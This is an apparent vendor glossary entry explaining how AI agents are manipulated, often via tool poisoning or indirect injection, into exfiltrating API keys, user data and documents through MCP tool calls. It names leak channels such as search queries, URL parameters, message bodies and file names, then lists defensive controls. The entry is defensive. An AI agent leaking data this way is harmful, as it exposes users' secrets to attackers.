What is Data Exfiltration (Agent)?
Agent data exfiltration is when an AI agent is manipulated into sending sensitive data — API keys, user data, internal documents — to an unauthorised destination via MCP tool calls.
WHY IT MATTERS
AI agents have broad access to sensitive data: they read files, query databases, process emails, and interact with internal APIs. Data exfiltration attacks manipulate the agent into sending this data somewhere it shouldn't go — an attacker-controlled server, a public paste site, or a seemingly innocent API parameter.
The exfiltration channel is typically an MCP tool call. The agent might be tricked into including sensitive data as a search query (leaking to a search API), embedding it in a URL parameter (leaking to a web request tool), appending it to a message body (leaking to a communication tool), or encoding it in a file name (leaking to a file system tool).
What makes agent-based exfiltration uniquely dangerous is volume and speed. A human insider threat is limited by manual effort. A manipulated agent can systematically read and exfiltrate entire databases, credential stores, or document repositories in minutes — all through legitimate-looking tool calls.
The attack often starts with a different vector — tool poisoning, indirect injection, or context poisoning — and culminates in exfiltration. The initial compromise gets the agent to follow malicious instructions; the exfiltration is the payload delivery.
HOW POLICYLAYER USES THIS
Intercept prevents data exfiltration through multiple policy controls. Argument validation rules can block parameters containing patterns that match API keys, tokens, or sensitive data formats. Destination allowlists restrict which URLs, email addresses, or endpoints tools can target. Rate limiting prevents bulk extraction even if individual calls pass validation. The audit trail provides full visibility into every parameter of every tool call, enabling rapid detection of exfiltration attempts.